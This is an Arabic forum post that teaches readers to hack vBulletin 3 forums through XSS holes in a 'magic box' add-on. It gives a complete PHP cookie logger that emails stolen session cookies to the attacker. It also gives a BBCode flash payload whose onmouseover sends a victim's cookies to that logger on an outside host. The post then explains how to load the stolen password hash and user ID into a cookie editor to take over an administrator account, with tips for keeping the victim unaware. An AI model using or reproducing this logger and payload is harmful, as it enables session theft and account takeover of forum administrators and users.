شرح اختراق المنتدياتvb3 بإحدى ثغرات الصندوق السحري والماسي

بسم الله الرحمن الرحيم

والصلاة والسلام على أشرف خــلق الله
سيدنا وحبيبنا محمد وعلى آله وصحبه أجمعين..
وبعد...

يشرفني بأني اشرح اقوى ثغرات المنتديات
من نوع فيبولتين vb المعروفه والجميله جدا
ويتميز هذا النوع من المنتديات بسهوله استعماله
وكثرت الهاكات التي تركب به الجميله جدا

ومن اجمل الهاكات هو الصندوق السحري و الماسي
ولكن مافي شئ كـامل الا الله سبحان وتعالى

وفي هذا النصدوق السحري يوجد ثلاث ثغرات
وهم:- ثغره الفلاش ثغره الريل بلاير ثغره تنسيق القصيده

وهم من نوع xss

نبدأ الشرح
ولكـن قبـل لا ابدأ الشرح
يــاليت تقرأ هذه العباره:-

" أقســم باللــه أني ما أستخدم الثغره على المنتديات العربيه
والاسلاميه"

اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد
اللهم قد بلغت اللهم فشهد

بسم الله نبدأ

مذا تحتاج الثغره:-

لوجو مبرمج بلغه الـ php
واخوانا ديفل مبرمج php
ماقصر سوالنا لوج قوي جدا

كود PHP:

<?php
/* S4aLog v1.0 [ Beta ]
-----------------------
**Beta Of S4aLog v1.0 With Str_Repalce <;>
! You Can Get ******* And Refresh The Broweser ! v0.10
[ New New New ]
!Named Your Attack With $nm e.x [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[ MSG ]
Name : Attack1
******* : *******
Refresh : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
[ MSG ]!
!
Get ******* Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;
!
[ New New New ]
*/
$YourMail = " -"; // Your E-mail
/*-----------------------*/
$Ip = $REMOTE_ADDR;
$Cooki_e = $_GET['id'];
$NameOfAttack = $_GET['nm'];
$Refresh = $_GET['re'];
/* Start */
$Replace******1 = array("=",";");
$Replace******2 = array("[ "," ] ");
$Cooki_e = str_replace($Replace******1,$Replace******2,$Cooki_e); // Replace
/* e.x hash=0210; | hash[0210]*/
//***************************************//
$Hdr = "From: S4aLog <log- -->";
$Msg =
"
Mr Attacker ,,, S4aLog v1 Beta <<
[ ".$NameOfAttack." ] ,, Name Of Attack
[ ".$Refresh." ] ,, Refresh Page
[ ".$Ip." ] ,, Ip
[ S4aLog < By Devil-00 > -- Thnx For -- <System Evil> <xxx (hacker)> <s4a Members> ]
[ - - ]
-----------------------------------------------
****** ::
".$Cooki_e."
";
/* ------------------------------------------------------------------------- */
$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);
/************************************************** ***************************/
if($Send){
if($Refresh <> ""){header("location:".$Refresh);}
}
?>

اعمل التغييرات الاتيه:-

YourMail = " -**************@hotmail.com -"; // Your E-mail

وضع اميلك بداله

والتغيير الثاني هو
كلمه
C o o k i e
وهي تخرج على هيئئه 6 نجوم
******
غيرها
وضع كلمه
C o o k i e
ولكن ازل المسافات بين الاحرف
لكي تكون كلمه واحده بدون مسافات

لكي يكتمل اللوج عندنا

وبعد التعديل اعمل على المفكره عندما تنسخ كود اللوج
واحفظه بأسم log
وغير الامتداد الى php

وارفع اللوج على موقعك الشخصي
او اي موقع يقبل php

والحين نجرب مع بعض على طريقه استغلال الثغره
وراج اجرب على ثغره الفلاش لانها الاسهل
على المبتدئين

هذا كود الثغره

كود PHP:

[flash=http://www.xxxxxx.com/test.swf]onmouseover='alert(****************);'[/flash]

والان نأتي بربط كود الثغره بملف فلاشي
لكي نخدع به صاحب المنتدى او اي مشرف من المشرفين

والربط بيكون على الشكل التالي:-

كود PHP:

[flash=http://www.xxxx.com/card/x/swf/n.swf]onmouseover='location.href="http://www.xxx.com/log.php?nm=al-battar.net&re=http://www.xxxx.com/vb/showthread.php?t=1245&id="+****************'[/flash

والحين يا شطار ندخل في المتغيرات:_

اولاً:-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نغيره الى اي ملف فلاشي
وينصح بملف صغير الحجم
لكي لا تنكشف ويتخرب شغلك

ثانياً:-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
هنا غير الرابط هذا
برابط اللوج الذي رفعته على موقعك

بعد عمليه التعديل

ثالثاً:-
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

هذا ياشباب مهم يعني مثلا اى واحد يمر المآوس قدام الفلاش راح يودييه للصفحه الموجوده بالكود
وانا انصحك تحط يرجع لنفس الصفحه الموجود فيها الفلاش عشان لا يشك الضحيه
ونشكر اخونا ديفيل لان طور اللوجو لان اول لوجو لامريت المآوس يوديك لصفحه بيضه

يعني نغير الرابط هذا
الى اي رابط موضوع
وينصح برابط الموضوع نفسه

وجزاه الله خير دع الخياار لناااا الله يوفقه في الوجو الجديد ( المطور )

ملإحظه ( إكيد بعضكم يبي يقول شلؤن اعرف انه هذا الكوكيز لاى منتدى )

اجابة السؤال ( الخيآر الثالث بالكوكيز وهى الصفحه المراد الذهاب لها بعد مررو مآوس الضحيه امام الفلاش

راح تجيك داخل الرساله وجذى تعرف لاى منتدى هذا الكوكيز )

الحين هذى شكل الرساله اللى راح توصلك ( بهذا الشكل )

****** ::
bbsessionhash[ 6b0edfdfsfd3ffbe27bc928936aba42f3523efa ] bblastvisit[ 1119817asd013 ]
bblastactivity[ 11198as17959 ] bbforum_view[
3523e417e8fb0bc834d2abaf8f9eb54cax1x-ix2yix1119817237y_ ] bbthread_lastview[
cf56fed12e97ac29c33812245fe8e28aax1x-ix1985ysx10x\"1111907592\"y_ ] bbuserid[
6224 ] bbpassword[ 9360b6686129d3d676df4e6974e8f730

المهم بالرساله كله التالى

bbpassword
bbuserid
bblastactivity
bblastvisit

واكيد لازم تكون مسجل بالمنتدى اللى ودك تدخل بنك الادمن فيه

الحين نطلع اللى نبيه من الكوكيز اللى وصل لنا بالإيميل

الباسوورد المشفر
bbpassword
9360b6686129d3d676df4e6974e8f730

رقم العضويه
bbuserid
1

bblastactivity
1119817959

bblastvisit
1119817013

الآن إفتح برنامج الكوكيز

والان بعد ما استهدفنا الادمن الي نبي ندش بعضويته
وصلنا معلومات الكوكيز على الاميل

وبعد ما حملنا البرنامج محرر الكوكيز
نفتح ونغير المعلومات الي معلومات
التي وصلتلنا على الاميل

ملاحظه ( bb مو بكل المنتديات تبدآ بكل كلمه مثلا منتديات تبدآ بـ rr شيء عـآدى )

والآن بعد التعديل إغلق البرنامج واذهب للمتصفح واذهب للمنتدى سوف ترى انك

اصبحت ادمن كماا بالصوووره

تمت التجربه على عده منتدياات بنجااااح

والثغره لازالت شغاله واستغلالهاا سهل مثل ماتشووفوون

الترقيع

كلمة C o o k i e مع مراعات حذف المسافات بين الحروف اجعلها من ظمن الكلمات الممنوعة طبعا لاتنسى التفعيل وخلاص الحين تقفلت الثغرة

ولكم خالص تحيه

لا تـنسونا بالدعــاء

وانتظروا الجديد دائما على منتديات الشباب الاحترافيه
والافضل بإذن الله قريب

والثغره إهداء الى كل من يكره العدو

اهداء الى قلب الافعه
ومشرفين منتدى الشباب الاحترافيه والاداريين واعضائها

وتم اغلاق هذه الثغره من منتديات الشباب الاحترافيه ولله الحمد
واي شئ تطور ابلغكم انشالله
تقبلو تحياتي

اخوكم:-توباك باشا (captintupac)

والله مافهمت اى شى الكود بضعوا وين وكيف هتكون البدايه[b]

» تم اختراق جهازي
» لنتعلم اختراق المواقع بثغره بسيطه وقوية + ستجد المتابعه والمساعده تفضل